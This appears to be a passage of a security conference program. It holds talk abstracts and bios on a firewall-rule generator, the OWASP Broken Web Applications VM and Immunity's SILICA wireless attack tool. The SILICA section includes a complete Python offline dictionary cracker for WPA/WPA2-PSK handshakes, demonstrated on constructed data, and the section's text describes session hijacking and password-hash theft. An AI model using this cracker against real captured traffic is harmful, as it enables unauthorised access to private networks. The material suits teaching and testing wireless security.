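                rule += " -p %s" % proto
            rule += " -s %s -d %s" % (src, dst)
            if port is not None:
                rule += " --dport %d" % port
            lines.append(rule + " -j %s" % ACTIONS[t.action][1])
    return lines


if __name__ == "__main__":
    print("\n".join(render_cisco(POLICY)))
    print("\n".join(render_iptables(POLICY)))
```

Both renderers consume the same expanded rule stream, so adding a target is a new render function rather than a second copy of the policy, and changing a network definition changes every platform's filter at once.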

Paul (Tony) Watson currently lives in Denver, CO. He spends his time flying FPV R/C planes and helicopters, writing code, breaking things, and working as a senior security engineer at Google.

Chuck Willis

OWASP Broken Web Applications Project

The Open Web Application Security Project (OWASP) Broken Web Applications project ( provides a free and open source virtual machine loaded with web applications containing security vulnerabilities. This session will showcase the project and exhibit how it can be used for training, testing, and experimentation by people in a variety of roles.

Demonstrations will cover how the project can be used by penetration testers who discover and exploit web application vulnerabilities, by developers and others who prevent and defend against web application attacks, and by individuals who respond to web application incidents.

Chuck Willis is a Technical Director with MANDIANT, a full spectrum information security company in Alexandria, Virginia. At MANDIANT, Mr. Willis concentrates in several areas including application security, where he assesses the security of sensitive software applications through external testing and static analysis. He also studies static analysis tools and techniques and strives to identify better ways to evaluate and secure software. Mr. Willis is the leader of the OWASP Broken Web Applications project, which distributes a virtual machine with known vulnerable web applications for testing and training.

Mark Wuergler


SILICA is Immunity's automated wireless attack utility designed to assess the security of wireless networks. Some of the features include:

  • Recover WEP and WPA1/2 keys
  • Crack LEAP Authentication
  • Reveal hidden SSIDs
  • Discover associated wireless clients
  • Automatically scan networks for vulnerabilities
  • Decrypt WPA traffic of all associated clients
  • Hijack web application sessions

SILICA's goal is to aid wireless penetration testing. Everything from recon to active exploitation is available to the user in a visual and dynamic format. Using SILICA it is possible to reduce the false positives common in most vulnerability scanners by actively exploiting discovered hosts with the latest CANVAS client-side and remote exploits, complete with a variety of post-exploitation actions such as grabbing password hashes, all wireless profiles/keys on the compromised host and a screenshot of the active desktop. All of this at the click of a button!
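As an added illustration of the "Recover WPA1/2 keys" item in the feature list above (example code written for this page, not SILICA's or Immunity's), here is the offline check that any WPA/WPA2-PSK cracker performs against a captured 4-way handshake: derive the PMK from each candidate passphrase with PBKDF2, expand it to the PTK with the 802.11i PRF, and compare the recomputed EAPOL-Key MIC of message 2 with the captured one. The SSID, MAC addresses, nonces and the message-2 frame are constructed here rather than taken from a real capture; the one published value used is the IEEE 802.11i PSK-to-PMK test vector (passphrase "password", SSID "IEEE"), which the test checks.

```python
import hashlib
import hmac
import struct

MIC_OFFSET = 81   # EAPOL header (4) + descriptor type, Key Info, Key Length, replay counter,
                  # nonce, IV, RSC, key ID (77) precede the 16-byte Key MIC field

# Constructed handshake parameters; not from a real capture.
SSID = "IEEE"
AA = bytes.fromhex("020000000001")      # authenticator (AP) MAC
SPA = bytes.fromhex("020000000002")     # supplicant (client) MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK -> PMK: PBKDF2-HMAC-SHA1, 4096 iterations, 256-bit output."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes, length: int = 48) -> bytes:
    """802.11i PRF-n: iterated HMAC-SHA1 over label || 0x00 || data || counter byte.
    48 bytes is a CCMP PTK (KCK 16 | KEK 16 | TK 16); TKIP needs 64."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:length]


def key_version(frame: bytes) -> int:
    """Descriptor version from Key Information bits 0-2: 1 = HMAC-MD5 (WPA), 2 = HMAC-SHA1-128 (WPA2)."""
    return struct.unpack_from(">H", frame, 5)[0] & 0x7


def eapol_mic(kck: bytes, frame: bytes, version: int) -> bytes:
    """Key MIC over the entire EAPOL-Key frame with the MIC field zeroed."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_message2(kck: bytes, snonce: bytes, version: int = 2) -> bytes:
    """Constructed EAPOL-Key message 2 of 4: RSN descriptor, MIC and Pairwise bits set, empty key data."""
    body = struct.pack(">BHH", 2, 0x0100 | 0x0008 | version, 16)              # type, Key Info, Key Length
    body += b"\x00" * 8 + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # replay ctr, nonce, IV, RSC, ID
    body += b"\x00" * 16 + struct.pack(">H", 0)                                 # MIC placeholder, key data len
    frame = struct.pack(">BBH", 2, 3, len(body)) + body                         # EAPOL v2, type 3 (Key)
    mic = eapol_mic(kck, frame, version)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack(ssid, aa, spa, anonce, snonce, message2, wordlist):
    """Offline dictionary attack: return the candidate whose recomputed MIC matches the captured one."""
    version = key_version(message2)
    captured = message2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = wpa_ptk(wpa_pmk(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, message2, version), captured):
            return candidate
    return None


# The "capture": message 2 built with the true passphrase, which the cracker never sees directly.
TRUE_KCK = wpa_ptk(wpa_pmk("password", SSID), AA, SPA, ANONCE, SNONCE)[:16]
SAMPLE_MESSAGE2 = build_message2(TRUE_KCK, SNONCE)

if __name__ == "__main__":
    print(crack(SSID, AA, SPA, ANONCE, SNONCE, SAMPLE_MESSAGE2, ["letmein", "qwerty123", "password"]))
```

The cost per candidate is dominated by the 4096 PBKDF2 rounds, which is why the only practical defence for a PSK network is a passphrase that is not in any wordlist; the nonces and MACs are public in the capture and contribute nothing to the attacker's work.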

Mark Wuergler is an active SILICA developer and security consultant for Immunity, Inc. in Miami Beach, Florida. For many years Mark has helped develop and teach advanced security courses and perform security assessments for Fortune 500 companies as well as government, financial and educational sectors all over the world. Before joining Immunity he was working as a lead security specialist for a security firm in Moscow, Russia, with a focus on application and wifi assessments.